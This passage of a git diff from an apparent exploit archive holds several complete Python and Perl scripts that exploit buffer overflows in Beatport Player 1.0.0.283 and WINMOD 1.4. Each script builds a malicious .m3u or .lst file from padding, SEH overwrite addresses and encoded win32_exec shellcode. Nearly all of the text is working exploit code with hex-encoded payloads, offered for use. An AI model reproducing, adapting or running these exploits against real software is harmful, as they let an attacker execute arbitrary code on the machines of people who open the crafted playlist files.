"Error" - -# milw0rm.com [2009-05-01] +#usage: exploit.py +# Grab the exploit file into the program +print "**************************************************************************" +print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\n" +print " Refer: http://www.milw0rm.com/exploits/8588\n" +print " Exploit code: His0k4\n" +print " Tested on: Windows XP Pro SP3 (EN)\n" +print " greetz: TO ELITE ALGERIANS,snakespc.com\n" +print "**************************************************************************" + + +buff = "\x41" * 1232 +next_seh = "\xEB\x06\x90\x90" +seh = "\xB8\x15\xD1\x72" #msacm32.drv + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +shellcode = ( +"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8" +"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73" +"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f" +"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b" +"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50" +"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12" +"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd" +"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e" +"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32" +"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36") + +exploit = buff + next_seh + seh + shellcode + +try: + out_file = open("exploit.m3u",'w') + out_file.write(exploit) + out_file.close() + raw_input("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-05-01] diff --git a/platforms/windows/local/8591.py b/platforms/windows/local/8591.py index 1000dfeea..4331c6d3a 100755 --- a/platforms/windows/local/8591.py +++ b/platforms/windows/local/8591.py @@ -1,49 +1,49 @@ -#exploit.py -# -# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit -# By: Encrypt3d.M!nd -# -# Tested on : Windows xp sp2 -# - -chars = "\x41" * 1232 - -ns = "\xEB\x06\x90\x90" -sh = "\x35\x2F\xD1\x72" - -nops = "\x90" * 20 - -# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 -Encoder=PexAlphaNum http://metasploit.com - -shellcode=( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" -"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x47" -"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x58" -"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x38" -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x58" -"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44" -"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x48\x4e\x51\x4b\x38" -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x30\x43\x4c\x41\x33" -"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47" -"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a" -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b" -"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x56\x4e\x33\x4f\x35\x41\x53" -"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37" -"\x42\x35\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x4a\x46\x4a\x39" -"\x50\x4f\x4c\x58\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36" -"\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x37\x45\x56\x42\x50\x5a") - - - -file=open('Devil_inside.m3u','w') -file.write(chars+ns+sh+nops+shellcode) -file.close() - -# milw0rm.com [2009-05-01] +#exploit.py +# +# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit +# By: Encrypt3d.M!nd +# +# Tested on : Windows xp sp2 +# + +chars = "\x41" * 1232 + +ns = "\xEB\x06\x90\x90" +sh = "\x35\x2F\xD1\x72" + +nops = "\x90" * 20 + +# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 +Encoder=PexAlphaNum http://metasploit.com + +shellcode=( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" +"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x47" +"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x58" +"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x38" +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x58" +"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44" +"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x48\x4e\x51\x4b\x38" +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x30\x43\x4c\x41\x33" +"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47" +"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a" +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b" +"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x56\x4e\x33\x4f\x35\x41\x53" +"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37" +"\x42\x35\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x4a\x46\x4a\x39" +"\x50\x4f\x4c\x58\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36" +"\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x37\x45\x56\x42\x50\x5a") + + + +file=open('Devil_inside.m3u','w') +file.write(chars+ns+sh+nops+shellcode) +file.close() + +# milw0rm.com [2009-05-01] diff --git a/platforms/windows/local/8592.pl b/platforms/windows/local/8592.pl index 433aecbcd..207f17555 100755 --- a/platforms/windows/local/8592.pl +++ b/platforms/windows/local/8592.pl @@ -1,29 +1,29 @@ - #!/usr/bin/perl -# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH) -# Work Only in WIN SP2 FR -# Credit to SirGod The Discover -# Stack The exploiter -# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d -# After exec the exploit wait some sec for see the cmd executed :d -use strict; -use warnings; -# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078 -my $shellcode = -"\x8B\xEC\x33\xFF\x57". -"\xC6\x45\xFC\x63\xC6\x45". -"\xFD\x6D\xC6\x45\xFE\x64". -"\xC6\x45\xF8\x01\x8D". -"\x45\xFC\x50\xB8\xC7\x93". -"\xBF\x77\xFF\xD0"; -my $junk = "\x41" x 1232; -my $next_seh="\xeb\x06\x90\x90"; -my $seh = "\x44\x25\xD1\x72"; # -my $nops = "\x90" x 4; -my $nopsled = "\x90" x 20; -open(my $playlist, "> seh_exploit.m3u"); -print $playlist - $junk.$next_seh.$seh.$nops.$shellcode.$nopsled. - "\r\n"; -close $playlist; - -# milw0rm.com [2009-05-01] + #!/usr/bin/perl +# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH) +# Work Only in WIN SP2 FR +# Credit to SirGod The Discover +# Stack The exploiter +# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d +# After exec the exploit wait some sec for see the cmd executed :d +use strict; +use warnings; +# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078 +my $shellcode = +"\x8B\xEC\x33\xFF\x57". +"\xC6\x45\xFC\x63\xC6\x45". +"\xFD\x6D\xC6\x45\xFE\x64". +"\xC6\x45\xF8\x01\x8D". +"\x45\xFC\x50\xB8\xC7\x93". +"\xBF\x77\xFF\xD0"; +my $junk = "\x41" x 1232; +my $next_seh="\xeb\x06\x90\x90"; +my $seh = "\x44\x25\xD1\x72"; # +my $nops = "\x90" x 4; +my $nopsled = "\x90" x 20; +open(my $playlist, "> seh_exploit.m3u"); +print $playlist + $junk.$next_seh.$seh.$nops.$shellcode.$nopsled. + "\r\n"; +close $playlist; + +# milw0rm.com [2009-05-01] diff --git a/platforms/windows/local/9221.pl b/platforms/windows/local/9221.pl index cbc93d91c..89314f1b3 100755 --- a/platforms/windows/local/9221.pl +++ b/platforms/windows/local/9221.pl @@ -1,44 +1,44 @@ -#!/usr/bin/perl -# by hack4love -# hack4love@hotmail.com -# WINMOD V 1.4 (.lst File) Local Buffer Overflow Exploit (SEH) -##http://www.software112.com/products/winmod+download.html -# ## easy ## -# Thanks for ELNAMER ELMASRY\EL7ADRANY\DeCo017\ZAX\ASER ELRO7 -## this work sooooooooo good -## Tested on: Windows XP Pro SP2 (EN) -################################################################## -my $bof="\x41" x 2880; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\x8c\x29\xd3\x74";##EVIL RET -my $nop="\x90" x 20; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". -"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> HACK4LOVE.LST'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-07-21] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# WINMOD V 1.4 (.lst File) Local Buffer Overflow Exploit (SEH) +##http://www.software112.com/products/winmod+download.html +# ## easy ## +# Thanks for ELNAMER ELMASRY\EL7ADRANY\DeCo017\ZAX\ASER ELRO7 +## this work sooooooooo good +## Tested on: Windows XP Pro SP2 (EN) +################################################################## +my $bof="\x41" x 2880; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\x8c\x29\xd3\x74";##EVIL RET +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> HACK4LOVE.LST'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-07-21] diff --git a/platforms/windows/local/9229.py b/platforms/windows/local/9229.py index ad6bb80ec..98debf540 100755 --- a/platforms/windows/local/9229.py +++ b/platforms/windows/local/9229.py @@ -1,49 +1,49 @@ -#!/usr/bin/python -#[*] Exploit : WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH) -#[*] Tested on : Xp sp2 fr -#[*] Original exploit : http://www.milw0rm.com/exploits/9221 -#[*] By : Dz_Girl -#[*] Greets to : hisok4 (even if he doesn't know me) & all friends - - -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -shellcode=( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" -"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41" -"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41" -"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59" -"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c" -"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45" -"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66" -"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f" -"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59" -"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a" -"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44" -"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77" -"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a" -"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b" -"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57" -"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f" -"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73" -"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39" -"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45" -"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45" -"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41") - -payload = "DZ" -payload += shellcode -payload += "\x41"*(2868-len(shellcode)) -payload += "\xE9\xC7\xF4\xFF\xFF" -payload += "\x61"*5 -payload += "\xEB\xF4\x41\x41" -payload += "\x1E\x2F\x40\x00" - -try: - out_file = open("exploit.lst","w") - out_file.write(payload) - out_file.close() - print("\nExploit file created!\n") -except: - print "Error" - -# milw0rm.com [2009-07-22] +#!/usr/bin/python +#[*] Exploit : WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH) +#[*] Tested on : Xp sp2 fr +#[*] Original exploit : http://www.milw0rm.com/exploits/9221 +#[*] By : Dz_Girl +#[*] Greets to : hisok4 (even if he doesn't know me) & all friends + + +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +shellcode=( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41" +"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41" +"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59" +"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c" +"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45" +"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66" +"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f" +"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59" +"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a" +"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44" +"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77" +"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a" +"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b" +"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57" +"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f" +"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73" +"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39" +"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45" +"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45" +"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41") + +payload = "DZ" +payload += shellcode +payload += "\x41"*(2868-len(shellcode)) +payload += "\xE9\xC7\xF4\xFF\xFF" +payload += "\x61"*5 +payload += "\xEB\xF4\x41\x41" +payload += "\x1E\x2F\x40\x00" + +try: + out_file = open("exploit.lst","w") + out_file.write(payload) + out_file.close() + print("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-07-22] diff --git a/platforms/windows/local/9234.pl b/platforms/windows/local/9234.pl index f290f7750..e66f70dc5 100755 --- a/platforms/windows/local/9234.pl +++ b/platforms/windows/local/9234.pl @@ -1,70 +1,70 @@ -#!/usr/bin/perl -# -# Winmod 1.4 (.lst) Local Stack Overflow Exploit -# Exploit by CWH Underground -# Tested on Win XP SP2 EN -# -# Download: http://www.software112.com/products/winmod+download.html -# - -print "\n==================================================\n"; -print " Winmod 1.4 (.lst) Local Stack Overflow Exploit \n"; -print " \n"; -print " Discovered By CWH Underground \n"; -print "==================================================\n"; -print " \n"; -print " ,--^----------,--------,-----,-------^--, \n"; -print " | ||||||||| `--------' | O \n"; -print " `+---------------------------^----------| \n"; -print " `\_,-------, _________________________| \n"; -print " / XXXXXX /`| / \n"; -print " / XXXXXX / `\ / \n"; -print " / XXXXXX /\______( \n"; -print " / XXXXXX / \n"; -print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; -print " (________( \n"; -print " `------' \n"; -print " \n"; - -## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". -"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41". -"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41". -"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59". -"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c". -"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45". -"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66". -"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f". -"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59". -"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a". -"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44". -"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77". -"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a". -"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b". -"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57". -"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f". -"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73". -"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39". -"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45". -"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45". -"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41"; - -my $buf="\x41" x 500; -$buf = $buf."\x68\xD5\x85\x7C"; -$buf = $buf.("\x90" x 12); -$buf = $buf.$shellcode; -$buf = $buf."\x2E".("\x41"x9); - -open(FILE,'>cwh_xpl.lst') or die ("[+] Error: cannot open destination file\n"); -print FILE $buf; -close (FILE); - -print "[+] Create exploit file successful\n"; -print "[+] File's name is cwh_xpl.lst\n"; - -##################################################################### -#Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK -#Special Thx : asylu3, str0ke, citec.us, milw0rm.com -##################################################################### - -# milw0rm.com [2009-07-23] +#!/usr/bin/perl +# +# Winmod 1.4 (.lst) Local Stack Overflow Exploit +# Exploit by CWH Underground +# Tested on Win XP SP2 EN +# +# Download: http://www.software112.com/products/winmod+download.html +# + +print "\n==================================================\n"; +print " Winmod 1.4 (.lst) Local Stack Overflow Exploit \n"; +print " \n"; +print " Discovered By CWH Underground \n"; +print "==================================================\n"; +print " \n"; +print " ,--^----------,--------,-----,-------^--, \n"; +print " | ||||||||| `--------' | O \n"; +print " `+---------------------------^----------| \n"; +print " `\_,-------, _________________________| \n"; +print " / XXXXXX /`| / \n"; +print " / XXXXXX / `\ / \n"; +print " / XXXXXX /\______( \n"; +print " / XXXXXX / \n"; +print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; +print " (________( \n"; +print " `------' \n"; +print " \n"; + +## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". +"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41". +"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41". +"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59". +"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c". +"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45". +"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66". +"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f". +"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59". +"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a". +"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44". 